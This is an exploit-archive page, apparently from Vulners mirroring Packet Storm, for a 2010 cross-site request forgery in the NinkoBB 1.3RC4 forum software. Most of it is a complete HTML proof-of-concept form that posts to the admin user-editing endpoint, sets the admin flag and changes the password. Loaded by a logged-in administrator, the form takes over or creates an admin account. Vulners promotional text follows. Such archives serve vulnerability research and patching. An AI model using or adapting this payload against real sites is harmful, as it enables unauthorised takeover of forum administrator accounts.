Lucene search
K

NinkoBB 1.3RC4 Cross Site Request Forgery

🗓️ 17 Mar 2010 00:00:00Reported by ItSecTeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

NinkoBB 1.3RC4 Cross Site Request Forgery exploit to change admin user credentials and add a new admin user

Code
`#########################change admin (user,passwd) & add new admin user exploit################  
Author: ItSecTeam   
  
download from:http://ninkobb.com/releases/?NinkoBB-1.3RC4.zip  
  
script:NinkoBB 1.3RC4  
  
update:2010  
-----------------------------------------  
xpl:  
  
<html>  
<head>  
<body>  
<h2>coded by ahmadbady</h2>  
<td colspan="6" class="title">Admin Control Panel - Editing User</td>  
</tr>  
<form name="form" method="post" action="admin.php?a=users&edit=1">  
<td class="form">  
<dl class="input">  
<dt>Username</dt>  
<dd><input type="text" name="username" class="border" style="width: 40%" value="anything"></dd>  
<dl class="input">  
<dt>Settings<br /><br />  
<span></span>  
<dd><input type="checkbox" name="banned" /> banned</dd>  
<dd><input type="checkbox" name="moderator" /> moderator</dd>  
<dd><input type="checkbox" name="admin" checked /> admin</dd>  
<dl class="input">  
<dt>Email</dt>  
<dd><input type="text" name="email" class="border" style="width: 40%" value=""></dd>  
<dl class="input">  
<dt>New Password</dt>  
<dd><input type="password" name="npassword" class="border" style="width: 40%"></dd>  
<dl class="input">  
<dt>New Password Again</dt>  
<dd><input type="password" name="npassworda" class="border" style="width: 40%"></dd>  
<dl class="input">  
<dt>&nbsp;</dt>  
<dd><input type="submit" class="button" name="edit" value="submit"></dd>  
</body>  
</html>  
  
########################  
  
discovered by ahmadbady  
  
########################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation